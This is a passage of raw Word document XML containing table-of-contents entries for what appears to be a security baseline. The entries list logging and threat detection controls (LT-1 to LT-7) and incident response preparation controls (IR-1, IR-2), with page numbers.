              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449522 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>105</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3970DF2A" w14:textId="7BCB81B9" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449523" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Enable detection capabilities</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449523 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>105</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3A2E1DE8" w14:textId="31D6892D" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449524" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.1.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>LT-1: Enable threat detection capabilities</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449524 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>105</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="163E2A58" w14:textId="11BE15A0" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449525" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.1.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>LT-2: Enable threat detection for identity and access management</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449525 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>108</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="69EB3C5F" w14:textId="5A98FC73" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449526" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Enable comprehensive logging</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449526 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>111</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0077F084" w14:textId="04EC957B" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449527" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>LT-3: Enable logging for security investigation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449527 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>111</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1452AFED" w14:textId="445ECE07" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449528" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>LT-4: Enable network logging for security investigation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449528 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>117</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4333E4E0" w14:textId="5D8A0782" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449529" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Centralize and analyze</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449529 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>119</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="38E0392F" w14:textId="567AA0E1" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449530" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.3.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>LT-5: Centralize security log management and analysis</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449530 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>119</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0CFE8D1B" w14:textId="328E115A" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449531" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.3.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>LT-6: Configure log storage retention</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449531 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>122</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1C77EDCC" w14:textId="1FF66BCA" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449532" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.3.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>LT-7: Use approved time synchronization sources</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449532 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>124</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3FEA6C4C" w14:textId="35C51C94" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="480"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449533" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Incident Response</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449533 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>126</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F497A80" w14:textId="4779BF78" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449534" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Prepare for incident response</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449534 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>126</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="60ED40A3" w14:textId="0A328FE1" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449535" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.1.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>IR-1: Preparation - update incident response plan and handling process</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449535 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>126</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08D599A4" w14:textId="664FA7AF" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449536" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.1.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>IR-2: Preparation - setup incident notification</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449536 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
